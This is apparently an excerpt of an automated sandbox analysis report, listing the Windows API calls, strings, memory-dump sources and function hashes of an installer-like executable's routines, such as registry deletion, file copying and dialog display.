                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Message$Send$ClientScreen
                                                                                                      • String ID: f
                                                                                                      • API String ID: 41195575-1993550816
                                                                                                      • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                      • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                      • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                      • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                                      APIs
                                                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                      • MulDiv.KERNEL32(00025000,00000064,0042FC67), ref: 00403295
                                                                                                      • wsprintfW.USER32 ref: 004032A5
                                                                                                      • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                      Strings
                                                                                                      • verifying installer: %d%%, xrefs: 0040329F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                                      • String ID: verifying installer: %d%%
                                                                                                      • API String ID: 1451636040-82062127
                                                                                                      • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                      • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                      • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                      • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                      APIs
                                                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                      • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                      • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                      • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Char$Next$Prev
                                                                                                      • String ID: *?|<>/":
                                                                                                      • API String ID: 589700163-165019052
                                                                                                      • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                      • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                      • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                      • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                      APIs
                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Close$DeleteEnumOpen
                                                                                                      • String ID:
                                                                                                      • API String ID: 1912718029-0
                                                                                                      • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                      • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                      • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                      • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                      • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                      • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 1849352358-0
                                                                                                      • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                      • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                      • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                      • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                      APIs
                                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Timeout
                                                                                                      • String ID: !
                                                                                                      • API String ID: 1777923405-2657877971
                                                                                                      • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                      • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                      • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                      • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                      APIs
                                                                                                      • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                      • wsprintfW.USER32 ref: 00404483
                                                                                                      • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                                      • String ID: %u.%u%s%s
                                                                                                      • API String ID: 3540041739-3551169577
                                                                                                      • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                      • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                      • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                      • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
APIs
  • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
• RegCloseKey.ADVAPI32(00000000), ref: 0040282E
• RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
Strings
• DeleteRegKey: "%s\%s", xrefs: 00402843
• DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
Memory Dump Source
• Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: CloseDeleteOpenValuelstrlenwvsprintf
• String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
• API String ID: 1697273262-1764544995
• Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
• Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
• Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
• Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
APIs
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
  • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
  • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
• lstrlenW.KERNEL32 ref: 004026B4
• lstrlenW.KERNEL32(00000000), ref: 004026C1
• SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
• String ID: CopyFiles "%s"->"%s"
• API String ID: 2577523808-3778932970
• Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
• Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
• Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
• Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: lstrcatwsprintf
• String ID: %02x%c$...
• API String ID: 3065427908-1057055748
• Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
• Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
• Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
• Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
APIs
• OleInitialize.OLE32(00000000), ref: 00405083
  • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
• OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
Strings
Memory Dump Source
• Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: InitializeMessageSendUninitializelstrlenwvsprintf
• String ID: Section: "%s"$Skipping section: "%s"
• API String ID: 2266616436-4211696005
• Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
• Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
• Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
• Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
APIs
• GetDC.USER32(?), ref: 00402100
• GetDeviceCaps.GDI32(00000000), ref: 00402107
• MulDiv.KERNEL32(00000000,00000000), ref: 00402117
  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427979,759223A0,00000000), ref: 00406902
• CreateFontIndirectW.GDI32(00420110), ref: 0040216A
  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
Memory Dump Source
• Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: CapsCreateDeviceFontIndirectVersionwsprintf
• String ID:
• API String ID: 1599320355-0
• Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
• Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
• Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
• Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
APIs
  • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
• lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
• lstrcmpW.KERNEL32(?,Version ), ref: 00407276
• lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: lstrcpyn$CreateFilelstrcmp
• String ID: Version
• API String ID: 512980652-315105994
• Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
• Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
• Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
• Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                                      APIs
                                                                                                      • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                      • GetTickCount.KERNEL32 ref: 00403303
                                                                                                      • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                      • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                      • String ID:
                                                                                                      • API String ID: 2102729457-0
                                                                                                      APIs
                                                                                                      • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                      • String ID:
                                                                                                      • API String ID: 2883127279-0
                                                                                                      APIs
                                                                                                      • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                      • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
